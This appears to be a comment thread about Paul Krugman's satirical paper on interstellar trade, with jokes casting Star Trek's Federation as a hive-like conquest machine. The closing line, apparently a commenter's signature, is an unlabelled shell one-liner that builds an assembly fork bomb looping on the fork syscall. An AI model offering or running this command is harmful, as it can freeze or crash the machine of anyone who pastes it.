Paul Krugman's 1978 Theory of Interstellar Trade
jerryasher recommends Paul Krugman's blog at the NYTimes, where he introduces a paper he wrote, The Theory of Interstellar Trade, with tongue very much in cheek. Some packrat academician was kind enough to send him a scan, because "back then academics did their work with typewriters, abacuses, and stone axes." Abstract: This paper extends interplanetary trade theory to an interstellar setting. It is chiefly concerned with the following question: how should interest rates on goods in transit be computed when the goods travel at close to the speed of light? This is a problem because the time taken in transit will appear less to an observer traveling with the goods than to a stationary observer. A solution is derived from economic theory, and two useless but true theorems are proved... This paper, then, is a serious analysis of a ridiculous subject, which is of course the opposite of what is usual in economics."
You'd be better of using the Independence Day model of interstellar economics, where a permanently spaceborne species arrives at a technologically less advanced planet, strips it bare and then moves on.
Indeed I've always thought that that's the way the Federation really worked in Star Trek. All the feel good stuff we see is just propaganda from inside the system like Starship Troopers was. If you really were a primitive species then the Enterprise would arrive for peaceful contact and leave. But it would send your coordinates and description of your planetary defences (i.e. none worth mentioning) back to the Federation. A bit later swarms of starships would arrive and your planet could be turned into more starships and any survivors could be reprogrammed to serve on them, which doesn't seem a very skilled job. People seem curiously inhuman too. My explanation is that they're not really people. Physically they are mostly human with a few aliens, but socially they are more like insects in a hive. They follow orders without question and work without payment and show little concern for their individual interests or safety. If they'd been programmed to do their job without any choice in the matter it would all make sense.
It explains why they don't have money, or politics, or arguments of any sort. In the best 1984 style of course they criticise the Borg for behaving like this because it's always useful to have an enemy. I suspect that it's not really necessary anymore of course since their drones have long since lost even the possibility even considering that the system they are in is anything other than totally benign.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;